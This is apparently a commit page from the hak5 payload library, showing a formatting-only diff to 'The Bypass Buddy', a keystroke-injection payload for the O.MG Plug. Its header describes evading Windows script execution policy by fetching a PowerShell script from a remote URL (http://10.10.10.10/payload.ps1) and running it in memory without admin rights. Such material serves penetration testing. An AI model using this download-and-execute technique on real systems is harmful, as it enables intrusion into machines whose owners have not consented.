NOPs removed, formatting

hak5 · Sep 14, 2024 · c67545f · c67545f
1 parent 8d8fb3f
commit c67545f
Showing 1 changed file with 10 additions and 10 deletions.
diff --git a/payloads/library/execution/bypass-buddy/payload.txt b/payloads/library/execution/bypass-buddy/payload.txt
@@ -1,26 +1,26 @@
 REM_BLOCK
     Title: The Bypass Buddy
-  	Author: salt-or-ester | [email protected] | https://gitgud.io/saltorester 
-  	Description: Evade Windows Script Execution Policy
-  	Target: Windows 11
+    Author: salt-or-ester | [email protected] | https://gitgud.io/saltorester 
+    Description: Evade Windows Script Execution Policy
+    Target: Windows 11
     Device: O.MG Plug | https://hak5.org/products/omg-plug
-  	Version: 1.1
-  	Category: Execution
-
+    Version: 1.1
+    Category: Execution
+    
     Tested on: O.MG Plug Elite, Windows 11
     Will likely work on other devices and Windows flavors
-
+        
     The Bypass Buddy implements a method to evade Windows script execution 
     policy protections.
-
+        
     The approach involves downloading a Powershell script into memory (not disk), 
     and running it on-the-fly. 
-
+        
     This can be accomplished without administrative rights.
 END_REM
 
+REM Formatting is not indented to comply with O.MG Editor/UI
 FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
-REM Formatting is 'untabbed' to comply with O.MG Editor/UI
 REM Normally I would add this below the header, as it's a constant, but moving it here for portability
 REM Payload to download and run in memory
 DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"